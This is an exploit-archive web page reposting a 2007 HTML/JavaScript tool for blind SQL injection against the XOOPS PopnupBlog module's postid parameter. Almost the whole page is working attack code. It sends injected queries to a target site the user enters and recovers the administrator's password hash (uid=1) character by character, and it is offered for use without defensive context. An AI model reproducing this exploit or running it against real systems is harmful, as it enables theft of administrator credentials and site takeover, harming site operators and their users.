首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Xoops Module PopnupBlog <= 2.52 (postid) BLIND SQL Injection Exploit
来源:http://www.bluemooninc.biz/ 作者:ajann 发布时间:2007-04-04  
<html>
<head>
<title>XOOPS Module PopnupBlog <= 2.52 (postid) BLIND SQL Injection Exploit</title>

<script type="text/javascript">

//'===============================================================================================
//'[Script Name: XOOPS Module PopnupBlog <= 2.52 (postid) BLIND SQL Injection Exploit
//'[Coded by   : ajann
//'[Author     : ajann
//'[Contact    : :(
//'[S.Page     : http://www.bluemooninc.biz/
//'[$         : Free
//'[Using      : Write Target after Submit Click
//'===============================================================================================


   function nesneyarat() {

 var nesne;
 var tarayici = navigator.appName;

   
     if(tarayici == "Microsoft Internet Explorer"){
 nesne = new ActiveXObject("Microsoft.XMLHTTP");
    }
  else {
 nesne = new XMLHttpRequest();

  }
return nesne;
}

 var http = nesneyarat();



   function islemlink(adresyolla,charyolla) {

genreidim=document.getElementById('genreid').value
file="/modules/popnupblog/index.php?postid=" + genreidim
pathim=document.getElementById('path').value + file
karakterim=document.getElementById('karakter').value + charyolla
adres=document.getElementById('adresim').value + pathim +  adresyolla + karakterim


 

 http.open('get', adres);
 http.onreadystatechange = cevapFonksiyonu;
 http.send(null);
   

}



   function cevapFonksiyonu() {
 if(http.readyState == 4){
document.getElementById('mesaj').value = http.responseText;
yonlendir();

}
}



function yonlendir() {

  if (document.getElementById('mesaj').value.indexOf('<dt><h2 class="elmHeadline">', 0) == -1) {
 alert('False');


  }

 if (document.getElementById('mesaj').value.indexOf('<dt><h2 class="elmHeadline">', 0) != -1)  {
   alert('TRUEEEEEEE');
   }
 


  }

function dal() {

if (document.getElementById('buton').value == "Test Character(0)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=48)/*');
   document.getElementById('buton').value = "Test Character(1)"
 setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test Character(1)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=49)/*');
   document.getElementById('buton').value = "Test Character(2)"
 setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test Character(2)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=50)/*');
   document.getElementById('buton').value = "Test Character(3)"
 setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test Character(3)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=51)/*');
   document.getElementById('buton').value = "Test Character(4)"
 setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test Character(4)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=52)/*');
   document.getElementById('buton').value = "Test Character(5)"
 setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test Character(5)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=53)/*');
   document.getElementById('buton').value = "Test Character(6)"
 setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test Character(6)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=54)/*');
   document.getElementById('buton').value = "Test Character(7)"
 setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test Character(7)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=55)/*');
   document.getElementById('buton').value = "Test Character(8)"
 setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test Character(8)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=56)/*');
   document.getElementById('buton').value = "Test Character(9)"
 setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test Character(9)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=57)/*');
   document.getElementById('buton').value = "Test Character(a)"
 setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test Character(a)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=97)/*');
   document.getElementById('buton').value = "Test Character(b)"
 setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test Character(b)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=98)/*');
   document.getElementById('buton').value = "Test Character(c)"
 setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test Character(c)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=99)/*');
   document.getElementById('buton').value = "Test Character(d)"
 setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test Character(d)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=100)/*');
   document.getElementById('buton').value = "Test Character(e)"
 setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test Character(e)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=101)/*');
   document.getElementById('buton').value = "Test Character(f)"
 setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test Character(f)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=102)/*');
   document.getElementById('buton').value = "Finished"
 setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

 }



  }


</script>

   </head>

 <body bgcolor="#000000">

<center>

<p><b><font face="Verdana" size="2" color="#008000">XOOPS Module PopnupBlog <= 2.52 (postid) BLIND SQL Injection Exploit</font></b></p>

<p></p>
    <b><font face="Arial" size="1" color="#FF0000">Target:</font><font face="Arial" size="1" color="#808080">[http://[target]/</font><font color="#00FF00" size="2" face="Arial">
  </font><font color="#FF0000" size="2">&nbsp;</font></b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
  <input type="text" name="adresim" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';" value="http://"></p>
<br>
    <b><font face="Arial" size="1" color="#FF0000">&nbsp;Path:</font><font face="Arial" size="1" color="#808080">[http://[target]/[scriptpath]&nbsp;&nbsp;&nbsp; </font></b>
  <input type="text" name="path" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';" value="/">
  <p>
    <b><font face="Arial" size="1" color="#FF0000">&nbsp;Character:</font><font face="Arial" size="1" color="#808080">[Md5 
  Character 1-32]&nbsp;&nbsp; </font></b>
  <input type="text" name="karakter" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';" value="1">
</p>
  <p>
    <b><font face="Arial" size="1" color="#FF0000">Article Id:</font><font face="Arial" size="1" color="#808080">[print.php?articleid=]&nbsp;&nbsp; </font></b>
  <input type="text" name="genreid" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';" value="1">
</p>
  <p><input type="submit" value="Test Character(0)" name="buton" onclick="dal();"></p>
<br>
<textarea name="mesaj" rows="1" cols="20" style="visibility:hidden"></textarea> <br>
<p>

<b><font face="Verdana" size="2" color="#008000">ajann</font></b></p>
</p>
</center>


 </body>
 </html>


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Wordpress 2.1.2 (xmlrpc) Remot
·HP Mercury Quality Center 9.0
·IrfanView 3.99 (.ANI File) Loc
·MyBulletinBoard (MyBB) <= 1.2.
·MS Windows Animated Cursor (.A
·MS Windows Animated Cursor (.A
·Oracle 10g DBMS_AQ.ENQUEUE SQL
·Ipswitch WS_FTP 5.05 Server Ma
·CyBoards PHP Lite 1.21 (script
·Frontbase <= 4.2.7 POST-AUTH R
·HP Mercury Quality Center Spid
·AOL SuperBuddy ActiveX Control
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved